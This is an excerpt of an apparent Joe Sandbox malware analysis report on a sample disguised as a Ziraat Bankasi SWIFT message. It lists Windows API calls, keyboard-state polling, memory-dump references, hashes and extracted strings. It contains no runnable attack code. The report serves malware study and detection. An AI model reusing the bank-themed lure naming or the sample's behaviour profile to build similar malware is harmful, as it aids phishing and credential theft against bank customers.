                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 641708696-0
                                                                                                                                                        • Opcode ID: 2040d5cffeca250c258f5bb9fb4e0b60f60c105ffe38c3e6d6c5ba57837311eb
                                                                                                                                                        • Instruction ID: be7741a3a31942562ed4f614356e62d5413fa3194e3f7d52e7082ba2b7f0813a
                                                                                                                                                        • Opcode Fuzzy Hash: 2040d5cffeca250c258f5bb9fb4e0b60f60c105ffe38c3e6d6c5ba57837311eb
                                                                                                                                                        • Instruction Fuzzy Hash: 27619B30505604EFDB359F94EA88B7AB7F6FB85321F15451AE58686E70CBB0A8C0EB40
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0009B526: GetWindowLongW.USER32(?,000000EB), ref: 0009B537
                                                                                                                                                        • GetSysColor.USER32(0000000F), ref: 0009B438
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ColorLongWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 259745315-0
                                                                                                                                                        • Opcode ID: af859586b404cdcad08da50e261eb9cdec0df8818a1d65c86ac3718ad679c2cb
                                                                                                                                                        • Instruction ID: 3bb84e45bae0859efe0909eef188d6f8d1a4a5a889ded72799144dd397a6d6f8
                                                                                                                                                        • Opcode Fuzzy Hash: af859586b404cdcad08da50e261eb9cdec0df8818a1d65c86ac3718ad679c2cb
                                                                                                                                                        • Instruction Fuzzy Hash: A4419330100144AFDF206F68ED89BB93BA6EB46731F144261FEA58E5E6D7708C81FB21
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 136442275-0
                                                                                                                                                        • Opcode ID: 63bd8925291d64a428b64e9cde7585966e37a2a286ef1bf38d2dd3a58dafdbef
                                                                                                                                                        • Instruction ID: c8c5b851a6230d2866208f8a32bfb4a135d0ed6635da0e612ae49417fcd37b0c
                                                                                                                                                        • Opcode Fuzzy Hash: 63bd8925291d64a428b64e9cde7585966e37a2a286ef1bf38d2dd3a58dafdbef
                                                                                                                                                        • Instruction Fuzzy Hash: 38414D7788521CAECF61EB90CC41DCF73BDEB44310F0041A6B649A2052EA31ABE98F51
                                                                                                                                                        APIs
                                                                                                                                                        • CharLowerBuffW.USER32(0011DC00,0011DC00,0011DC00), ref: 000CD7CE
                                                                                                                                                        • GetDriveTypeW.KERNEL32(?,00133A70), ref: 000CD898
                                                                                                                                                        • _wcscpy.LIBCMT ref: 000CD8C2
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: BuffCharDriveLowerType_wcscpy
                                                                                                                                                        • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                        • API String ID: 2820617543-1000479233
                                                                                                                                                        • Opcode ID: 11e6e2b36259338d5f2a5fe953548e3c2e5f8d8cdf38223fedad669da268a096
                                                                                                                                                        • Instruction ID: 183e777bbe3cb6a8de8e027ed23dcb0a4c4bc629f8180a7c63c08eae186be6c7
                                                                                                                                                        • Opcode Fuzzy Hash: 11e6e2b36259338d5f2a5fe953548e3c2e5f8d8cdf38223fedad669da268a096
                                                                                                                                                        • Instruction Fuzzy Hash: 6F515C75104240AFD710EF14D891FAEB7A5FF84314F10892EF5AA972A2EB31DD09DB42
                                                                                                                                                        APIs
                                                                                                                                                        • __swprintf.LIBCMT ref: 000893AB
                                                                                                                                                        • __itow.LIBCMT ref: 000893DF
                                                                                                                                                          • Part of subcall function 000A1557: _xtow@16.LIBCMT ref: 000A1578
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __itow__swprintf_xtow@16
                                                                                                                                                        • String ID: %.15g$0x%p$False$True
                                                                                                                                                        • API String ID: 1502193981-2263619337
                                                                                                                                                        • Opcode ID: fd81776a81155f3141eca2d915db92a471d2e9a992448f40fdc96e6a18998157
                                                                                                                                                        • Instruction ID: b8f36424365730b95dbb406f9f95581dded283f297f807caaa27d29998e78eda
                                                                                                                                                        • Opcode Fuzzy Hash: fd81776a81155f3141eca2d915db92a471d2e9a992448f40fdc96e6a18998157
                                                                                                                                                        • Instruction Fuzzy Hash: 6141E471504209ABEB64FB74D942EBA73F8FF49310F24446EE58AD7182EA319A41DB50
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                                        • String ID: 0.0.0.0
                                                                                                                                                        • API String ID: 2620052-3771769585
                                                                                                                                                        • Opcode ID: 748b189838eb71e30e5fc45f484393966c6be46bdcb30a745ecff4ae560d59bd
                                                                                                                                                        • Instruction ID: 51f1ce9e0560a8d398ea55e9ecbfee576a9d93634738f95107d1abcc4f60bb78
                                                                                                                                                        • Opcode Fuzzy Hash: 748b189838eb71e30e5fc45f484393966c6be46bdcb30a745ecff4ae560d59bd
                                                                                                                                                        • Instruction Fuzzy Hash: E511D272904119ABCB35ABA0EC4AFDE77A8EB45710F0000BDF145A6082EFB19A828A50
                                                                                                                                                        APIs
                                                                                                                                                        • _memset.LIBCMT ref: 000A5047
                                                                                                                                                          • Part of subcall function 000A7C0E: __getptd_noexit.LIBCMT ref: 000A7C0E
                                                                                                                                                        • __gmtime64_s.LIBCMT ref: 000A50E0
                                                                                                                                                        • __gmtime64_s.LIBCMT ref: 000A5116
                                                                                                                                                        • __gmtime64_s.LIBCMT ref: 000A5133
                                                                                                                                                        • __allrem.LIBCMT ref: 000A5189
                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000A51A5
                                                                                                                                                        • __allrem.LIBCMT ref: 000A51BC
                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000A51DA
                                                                                                                                                        • __allrem.LIBCMT ref: 000A51F1
                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000A520F
                                                                                                                                                        • __invoke_watson.LIBCMT ref: 000A5280
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 384356119-0
                                                                                                                                                        • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                                                                                                        • Instruction ID: d125b0fba58530c81b954585d4637ca03f1f8229af39adfbd2039819f9a3bb60
                                                                                                                                                        • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                                                                                                        • Instruction Fuzzy Hash: 5671D772A00F16ABE7149EB8CC91BEA73E8BF16765F144229F514DB682E770DD408BD0
                                                                                                                                                        APIs
                                                                                                                                                        • _memset.LIBCMT ref: 000C4DF8
                                                                                                                                                        • GetMenuItemInfoW.USER32(00141708,000000FF,00000000,00000030), ref: 000C4E59
                                                                                                                                                        • SetMenuItemInfoW.USER32(00141708,00000004,00000000,00000030), ref: 000C4E8F
                                                                                                                                                        • Sleep.KERNEL32(000001F4), ref: 000C4EA1
                                                                                                                                                        • GetMenuItemCount.USER32(?), ref: 000C4EE5
                                                                                                                                                        • GetMenuItemID.USER32(?,00000000), ref: 000C4F01
                                                                                                                                                        • GetMenuItemID.USER32(?,-00000001), ref: 000C4F2B
                                                                                                                                                        • GetMenuItemID.USER32(?,?), ref: 000C4F70
                                                                                                                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 000C4FB6
                                                                                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 000C4FCA
                                                                                                                                                        • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 000C4FEB
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4176008265-0
                                                                                                                                                        • Opcode ID: f803a0f9bc4c285cda3b50ba6d6a2fd97ed89abc7643276465848f476ccdebb6
                                                                                                                                                        • Instruction ID: 12ce594e23e06752c53e2cd0ac4ce4032a39b3dab337192585011b4c1a4b39df
                                                                                                                                                        • Opcode Fuzzy Hash: f803a0f9bc4c285cda3b50ba6d6a2fd97ed89abc7643276465848f476ccdebb6
                                                                                                                                                        • Instruction Fuzzy Hash: E5616975900249AFEB21CFA4DC98EAE7BF8BB45308F14006DF841A7291D771AD86CB21
                                                                                                                                                        APIs
                                                                                                                                                        • GetKeyboardState.USER32(?), ref: 000C2B5F
                                                                                                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 000C2BE0
                                                                                                                                                        • GetKeyState.USER32(000000A0), ref: 000C2BFB
                                                                                                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 000C2C15
                                                                                                                                                        • GetKeyState.USER32(000000A1), ref: 000C2C2A
                                                                                                                                                        • GetAsyncKeyState.USER32(00000011), ref: 000C2C42
                                                                                                                                                        • GetKeyState.USER32(00000011), ref: 000C2C54
                                                                                                                                                        • GetAsyncKeyState.USER32(00000012), ref: 000C2C6C
                                                                                                                                                        • GetKeyState.USER32(00000012), ref: 000C2C7E
                                                                                                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 000C2C96
                                                                                                                                                        • GetKeyState.USER32(0000005B), ref: 000C2CA8
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: State$Async$Keyboard
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 541375521-0
                                                                                                                                                        • Opcode ID: 152d1c2d5ff6c710c82cff90c2bf10f8a7bc5eaa11add3dcae56f020ab4ade64
                                                                                                                                                        • Instruction ID: 5a832d20bec3e645a43513bd39c1438acfc43ee563b877ffcc40cea664a542a9
                                                                                                                                                        • Opcode Fuzzy Hash: 152d1c2d5ff6c710c82cff90c2bf10f8a7bc5eaa11add3dcae56f020ab4ade64
                                                                                                                                                        • Instruction Fuzzy Hash: CC41D4305047C96EFFB4AB608844BADBEE06B11304F04805DD9C656AC2DBE49DC8C7A2
                                                                                                                                                        APIs
                                                                                                                                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 000B94FE
                                                                                                                                                        • SafeArrayAllocData.OLEAUT32(?), ref: 000B9549
                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 000B955B
                                                                                                                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 000B957B
                                                                                                                                                        • VariantCopy.OLEAUT32(?,?), ref: 000B95BE
                                                                                                                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 000B95D2
                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 000B95E7
                                                                                                                                                        • SafeArrayDestroyData.OLEAUT32(?), ref: 000B95F4
                                                                                                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 000B95FD
                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 000B960F
                                                                                                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 000B961A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2706829360-0
                                                                                                                                                        • Opcode ID: bd8e7501afcd0a5d7786d452c9bdb6f903066143bf60100ee8bb4fff87d637b9
                                                                                                                                                        • Instruction ID: a9ab57291062fa7cebb7e3ccb951181ae967331a12e402ecafd64a1f8aeb17ba
                                                                                                                                                        • Opcode Fuzzy Hash: bd8e7501afcd0a5d7786d452c9bdb6f903066143bf60100ee8bb4fff87d637b9
                                                                                                                                                        • Instruction Fuzzy Hash: 70412C75A00219AFCB01EFE4D8849DEBBB9FF48354F008065E552E3661DB71EA85CBA1
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0008936C: __swprintf.LIBCMT ref: 000893AB
                                                                                                                                                          • Part of subcall function 0008936C: __itow.LIBCMT ref: 000893DF
                                                                                                                                                        • CoInitialize.OLE32 ref: 000DADF6
                                                                                                                                                        • CoUninitialize.OLE32 ref: 000DAE01
                                                                                                                                                        • CoCreateInstance.OLE32(?,00000000,00000017,0010D8FC,?), ref: 000DAE61
                                                                                                                                                        • IIDFromString.OLE32(?,?), ref: 000DAED4
                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 000DAF6E
                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 000DAFCF
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                                                                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                        • API String ID: 834269672-1287834457
                                                                                                                                                        • Opcode ID: 1cc60275c4978bd20d6480d6ce8d9bd495b1713e4ee9fa94fba76645c8c9c061
                                                                                                                                                        • Instruction ID: 6294ee24b858aa8f11bfad1805de81332f086669c7ae11c0c10017290073ffbf
                                                                                                                                                        • Opcode Fuzzy Hash: 1cc60275c4978bd20d6480d6ce8d9bd495b1713e4ee9fa94fba76645c8c9c061
                                                                                                                                                        • Instruction Fuzzy Hash: F5619D71308301AFC720EF94D844BAEB7E8AF4A714F14455AF9859B292C770ED44CBA3
                                                                                                                                                        APIs
                                                                                                                                                        • WSAStartup.WSOCK32(00000101,?), ref: 000D8168
                                                                                                                                                        • inet_addr.WSOCK32(?), ref: 000D81AD
                                                                                                                                                        • gethostbyname.WSOCK32(?), ref: 000D81B9
                                                                                                                                                        • IcmpCreateFile.IPHLPAPI ref: 000D81C7
                                                                                                                                                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 000D8237
                                                                                                                                                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 000D824D
                                                                                                                                                        • IcmpCloseHandle.IPHLPAPI(00000000), ref: 000D82C2
                                                                                                                                                        • WSACleanup.WSOCK32 ref: 000D82C8
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                                        • String ID: Ping
                                                                                                                                                        • API String ID: 1028309954-2246546115
                                                                                                                                                        • Opcode ID: 70330fae41d62246fc97eb9923af3e1647fe752565e9c7d2dd5c070098964ec8
                                                                                                                                                        • Instruction ID: 5eae82f924270f6271a24edffedb04dc0d7d4e1c73f6ab894aeb740a4116576c
                                                                                                                                                        • Opcode Fuzzy Hash: 70330fae41d62246fc97eb9923af3e1647fe752565e9c7d2dd5c070098964ec8
                                                                                                                                                        • Instruction Fuzzy Hash: BA51BE31604700AFDB20EF64DC45B6AB7E4BF48320F04896AF999DB3A1DB70E941DB52
                                                                                                                                                        APIs
                                                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 000CE396
                                                                                                                                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 000CE40C
                                                                                                                                                        • GetLastError.KERNEL32 ref: 000CE416
                                                                                                                                                        • SetErrorMode.KERNEL32(00000000,READY), ref: 000CE483
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                                                        • API String ID: 4194297153-14809454
                                                                                                                                                        • Opcode ID: 52824978368c02e848225e822dc448e068af6ac1e20e0581b613103129f709c5
                                                                                                                                                        • Instruction ID: 4e6538ca33f80445fa93fab6ecc2a5c490af8fb7703f8190152b7d48d84edc10
                                                                                                                                                        • Opcode Fuzzy Hash: 52824978368c02e848225e822dc448e068af6ac1e20e0581b613103129f709c5
                                                                                                                                                        • Instruction Fuzzy Hash: F8318135A002499FDB15EBA4D845FADB7F4FF04300F14802AF545EB292DB70AA42CB51
                                                                                                                                                        APIs
                                                                                                                                                        • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 000BB98C
                                                                                                                                                        • GetDlgCtrlID.USER32 ref: 000BB997
                                                                                                                                                        • GetParent.USER32 ref: 000BB9B3
                                                                                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 000BB9B6
                                                                                                                                                        • GetDlgCtrlID.USER32(?), ref: 000BB9BF
                                                                                                                                                        • GetParent.USER32(?), ref: 000BB9DB
                                                                                                                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 000BB9DE
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
